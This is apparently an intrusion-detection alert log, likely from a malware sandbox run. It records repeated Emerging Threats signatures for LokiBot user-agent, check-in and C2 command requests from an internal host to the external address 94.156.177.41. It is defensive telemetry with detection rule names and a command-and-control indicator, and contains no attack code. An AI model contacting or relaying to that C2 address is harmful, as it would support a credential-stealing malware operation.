2025-01-11T08:37:21.333703+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49834	94.156.177.41	80	TCP
2025-01-11T08:37:21.333703+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49834	94.156.177.41	80	TCP
2025-01-11T08:37:21.333703+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49834	94.156.177.41	80	TCP
2025-01-11T08:37:22.060608+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49834	94.156.177.41	80	TCP
2025-01-11T08:37:22.217012+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49841	94.156.177.41	80	TCP
2025-01-11T08:37:22.217012+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49841	94.156.177.41	80	TCP
2025-01-11T08:37:22.217012+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49841	94.156.177.41	80	TCP
2025-01-11T08:37:22.934799+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49841	94.156.177.41	80	TCP
2025-01-11T08:37:23.102371+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-11T08:37:23.102371+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-11T08:37:23.102371+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-11T08:37:23.790840+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49848	94.156.177.41	80	TCP
2025-01-11T08:37:24.122123+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49854	94.156.177.41	80	TCP
2025-01-11T08:37:24.122123+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49854	94.156.177.41	80	TCP
2025-01-11T08:37:24.122123+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49854	94.156.177.41	80	TCP
2025-01-11T08:37:24.850077+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49854	94.156.177.41	80	TCP
2025-01-11T08:37:25.027858+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-11T08:37:25.027858+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-11T08:37:25.027858+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-11T08:37:25.749213+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49864	94.156.177.41	80	TCP
2025-01-11T08:37:25.900548+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-11T08:37:25.900548+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-11T08:37:25.900548+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-11T08:37:26.588548+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49870	94.156.177.41	80	TCP
2025-01-11T08:37:26.766848+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-11T08:37:26.766848+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-11T08:37:26.766848+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-11T08:37:27.478445+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49876	94.156.177.41	80	TCP
2025-01-11T08:37:27.644318+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49882	94.156.177.41	80	TCP
2025-01-11T08:37:27.644318+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49882	94.156.177.41	80	TCP
2025-01-11T08:37:27.644318+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49882	94.156.177.41	80	TCP
2025-01-11T08:37:28.381899+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49882	94.156.177.41	80	TCP
2025-01-11T08:37:28.555245+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49888	94.156.177.41	80	TCP
2025-01-11T08:37:28.555245+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49888	94.156.177.41	80	TCP
2025-01-11T08:37:28.555245+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49888	94.156.177.41	80	TCP
2025-01-11T08:37:29.254495+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49888	94.156.177.41	80	TCP
2025-01-11T08:37:29.427877+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49895	94.156.177.41	80	TCP
2025-01-11T08:37:29.427877+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49895	94.156.177.41	80	TCP
2025-01-11T08:37:29.427877+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49895	94.156.177.41	80	TCP
2025-01-11T08:37:30.159633+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49895	94.156.177.41	80	TCP
2025-01-11T08:37:30.321553+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49904	94.156.177.41	80	TCP
2025-01-11T08:37:30.321553+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49904	94.156.177.41	80	TCP
2025-01-11T08:37:30.321553+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49904	94.156.177.41	80	TCP
2025-01-11T08:37:31.068873+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49904	94.156.177.41	80	TCP
2025-01-11T08:37:31.243472+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49911	94.156.177.41	80	TCP
2025-01-11T08:37:31.243472+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49911	94.156.177.41	80	TCP
2025-01-11T08:37:31.243472+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49911	94.156.177.41	80	TCP
2025-01-11T08:37:31.960696+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49911	94.156.177.41	80	TCP
2025-01-11T08:37:32.132348+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49917	94.156.177.41	80	TCP
2025-01-11T08:37:32.132348+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49917	94.156.177.41	80	TCP
2025-01-11T08:37:32.132348+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49917	94.156.177.41	80	TCP
2025-01-11T08:37:32.876960+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49917	94.156.177.41	80	TCP
2025-01-11T08:37:33.035370+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49923	94.156.177.41	80	TCP
2025-01-11T08:37:33.035370+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49923	94.156.177.41	80	TCP
2025-01-11T08:37:33.035370+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49923	94.156.177.41	80	TCP
2025-01-11T08:37:33.740539+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49923	94.156.177.41	80	TCP
2025-01-11T08:37:33.901353+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49929	94.156.177.41	80	TCP
2025-01-11T08:37:33.901353+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49929	94.156.177.41	80	TCP
2025-01-11T08:37:33.901353+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49929	94.156.177.41	80	TCP
2025-01-11T08:37:34.614693+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49929	94.156.177.41	80	TCP
2025-01-11T08:37:34.780300+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49938	94.156.177.41	80	TCP
2025-01-11T08:37:34.780300+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49938	94.156.177.41	80	TCP
2025-01-11T08:37:34.780300+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49938	94.156.177.41	80	TCP
2025-01-11T08:37:35.493079+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49938	94.156.177.41	80	TCP
2025-01-11T08:37:35.656565+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49946	94.156.177.41	80	TCP
2025-01-11T08:37:35.656565+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49946	94.156.177.41	80	TCP
2025-01-11T08:37:35.656565+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49946	94.156.177.41	80	TCP
2025-01-11T08:37:36.377601+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49946	94.156.177.41	80	TCP
2025-01-11T08:37:36.542434+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49952	94.156.177.41	80	TCP
2025-01-11T08:37:36.542434+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49952	94.156.177.41	80	TCP
2025-01-11T08:37:36.542434+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49952	94.156.177.41	80	TCP
2025-01-11T08:37:37.256341+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49952	94.156.177.41	80	TCP
2025-01-11T08:37:37.413981+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49958	94.156.177.41	80	TCP
2025-01-11T08:37:37.413981+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49958	94.156.177.41	80	TCP
2025-01-11T08:37:37.413981+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49958	94.156.177.41	80	TCP
2025-01-11T08:37:38.126336+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49958	94.156.177.41	80	TCP
2025-01-11T08:37:38.278632+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49964	94.156.177.41	80	TCP
2025-01-11T08:37:38.278632+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49964	94.156.177.41	80	TCP
2025-01-11T08:37:38.278632+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49964	94.156.177.41	80	TCP
2025-01-11T08:37:39.132869+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49964	94.156.177.41	80	TCP
2025-01-11T08:37:39.298255+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49972	94.156.177.41	80	TCP
2025-01-11T08:37:39.298255+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49972	94.156.177.41	80	TCP
2025-01-11T08:37:39.298255+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49972	94.156.177.41	80	TCP
2025-01-11T08:37:39.989261+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49972	94.156.177.41	80	TCP
2025-01-11T08:37:40.160259+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49980	94.156.177.41	80	TCP
2025-01-11T08:37:40.160259+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49980	94.156.177.41	80	TCP
2025-01-11T08:37:40.160259+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49980	94.156.177.41	80	TCP
2025-01-11T08:37:40.867627+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49980	94.156.177.41	80	TCP
2025-01-11T08:37:41.027625+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49987	94.156.177.41	80	TCP
2025-01-11T08:37:41.027625+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49987	94.156.177.41	80	TCP
2025-01-11T08:37:41.027625+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49987	94.156.177.41	80	TCP
2025-01-11T08:37:41.715847+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49987	94.156.177.41	80	TCP
2025-01-11T08:37:41.877046+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-11T08:37:41.877046+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-11T08:37:41.877046+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-11T08:37:42.601897+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49993	94.156.177.41	80	TCP
2025-01-11T08:37:42.766186+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	49999	94.156.177.41	80	TCP
2025-01-11T08:37:42.766186+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	49999	94.156.177.41	80	TCP
2025-01-11T08:37:42.766186+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	49999	94.156.177.41	80	TCP
2025-01-11T08:37:43.489590+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	49999	94.156.177.41	80	TCP
2025-01-11T08:37:43.647766+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50006	94.156.177.41	80	TCP
2025-01-11T08:37:43.647766+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50006	94.156.177.41	80	TCP
2025-01-11T08:37:43.647766+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50006	94.156.177.41	80	TCP
2025-01-11T08:37:44.355553+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50006	94.156.177.41	80	TCP
2025-01-11T08:37:44.509809+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50009	94.156.177.41	80	TCP
2025-01-11T08:37:44.509809+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50009	94.156.177.41	80	TCP
2025-01-11T08:37:44.509809+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50009	94.156.177.41	80	TCP
2025-01-11T08:37:45.204506+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50009	94.156.177.41	80	TCP
2025-01-11T08:37:45.351886+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50010	94.156.177.41	80	TCP
2025-01-11T08:37:45.351886+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50010	94.156.177.41	80	TCP
2025-01-11T08:37:45.351886+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50010	94.156.177.41	80	TCP
2025-01-11T08:37:46.087106+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50010	94.156.177.41	80	TCP
2025-01-11T08:37:46.247938+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-11T08:37:46.247938+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-11T08:37:46.247938+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-11T08:37:46.977754+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50011	94.156.177.41	80	TCP
2025-01-11T08:37:47.141186+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50012	94.156.177.41	80	TCP
2025-01-11T08:37:47.141186+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50012	94.156.177.41	80	TCP
2025-01-11T08:37:47.141186+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50012	94.156.177.41	80	TCP
2025-01-11T08:37:47.837286+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50012	94.156.177.41	80	TCP
2025-01-11T08:37:47.993044+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50013	94.156.177.41	80	TCP
2025-01-11T08:37:47.993044+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50013	94.156.177.41	80	TCP
2025-01-11T08:37:47.993044+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50013	94.156.177.41	80	TCP
2025-01-11T08:37:48.699029+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50013	94.156.177.41	80	TCP
2025-01-11T08:37:48.851758+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50014	94.156.177.41	80	TCP
2025-01-11T08:37:48.851758+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50014	94.156.177.41	80	TCP
2025-01-11T08:37:48.851758+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50014	94.156.177.41	80	TCP
2025-01-11T08:37:49.557629+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50014	94.156.177.41	80	TCP
2025-01-11T08:37:49.710358+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50015	94.156.177.41	80	TCP
2025-01-11T08:37:49.710358+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50015	94.156.177.41	80	TCP
2025-01-11T08:37:49.710358+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50015	94.156.177.41	80	TCP
2025-01-11T08:37:50.432462+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50015	94.156.177.41	80	TCP
2025-01-11T08:37:50.589002+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-11T08:37:50.589002+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-11T08:37:50.589002+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-11T08:37:51.359900+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50016	94.156.177.41	80	TCP
2025-01-11T08:37:51.533742+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-11T08:37:51.533742+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-11T08:37:51.533742+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-11T08:37:52.255722+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50017	94.156.177.41	80	TCP
2025-01-11T08:37:52.420648+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-11T08:37:52.420648+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-11T08:37:52.420648+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-11T08:37:53.124263+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50018	94.156.177.41	80	TCP
2025-01-11T08:37:53.281289+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-11T08:37:53.281289+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-11T08:37:53.281289+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-11T08:37:54.003233+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50019	94.156.177.41	80	TCP
2025-01-11T08:37:54.149795+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-11T08:37:54.149795+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-11T08:37:54.149795+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-11T08:37:54.850099+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50020	94.156.177.41	80	TCP
2025-01-11T08:37:55.447402+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-11T08:37:55.447402+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-11T08:37:55.447402+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-11T08:37:56.132335+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-11T08:37:56.296589+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-11T08:37:56.296589+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-11T08:37:56.296589+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-11T08:37:57.013035+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-11T08:37:57.168024+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-11T08:37:57.168024+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-11T08:37:57.168024+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-11T08:37:57.903370+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-11T08:37:58.108290+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-11T08:37:58.108290+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-11T08:37:58.108290+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-11T08:37:58.830433+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-11T08:37:58.997732+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-11T08:37:58.997732+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-11T08:37:58.997732+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-11T08:37:59.712910+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-11T08:37:59.881352+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-11T08:37:59.881352+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-11T08:37:59.881352+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-11T08:38:00.754871+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-11T08:38:00.923865+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-11T08:38:00.923865+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-11T08:38:00.923865+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-11T08:38:01.623270+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-11T08:38:01.801642+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-11T08:38:01.801642+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-11T08:38:01.801642+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-11T08:38:02.493986+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-11T08:38:02.929554+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-11T08:38:02.929554+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-11T08:38:02.929554+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-11T08:38:03.624137+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-11T08:38:03.788440+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-11T08:38:03.788440+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-11T08:38:03.788440+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-11T08:38:04.490753+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-11T08:38:04.654751+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50032	94.156.177.41	80	TCP
2025-01-11T08:38:04.654751+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50032	94.156.177.41	80	TCP
2025-01-11T08:38:04.654751+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50032	94.156.177.41	80	TCP
2025-01-11T08:38:05.395008+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50032	94.156.177.41	80	TCP
2025-01-11T08:38:05.736766+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-11T08:38:05.736766+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-11T08:38:05.736766+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-11T08:38:06.454721+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-11T08:38:06.637553+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-11T08:38:06.637553+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-11T08:38:06.637553+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-11T08:38:07.370753+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.9	50034	94.156.177.41	80	TCP
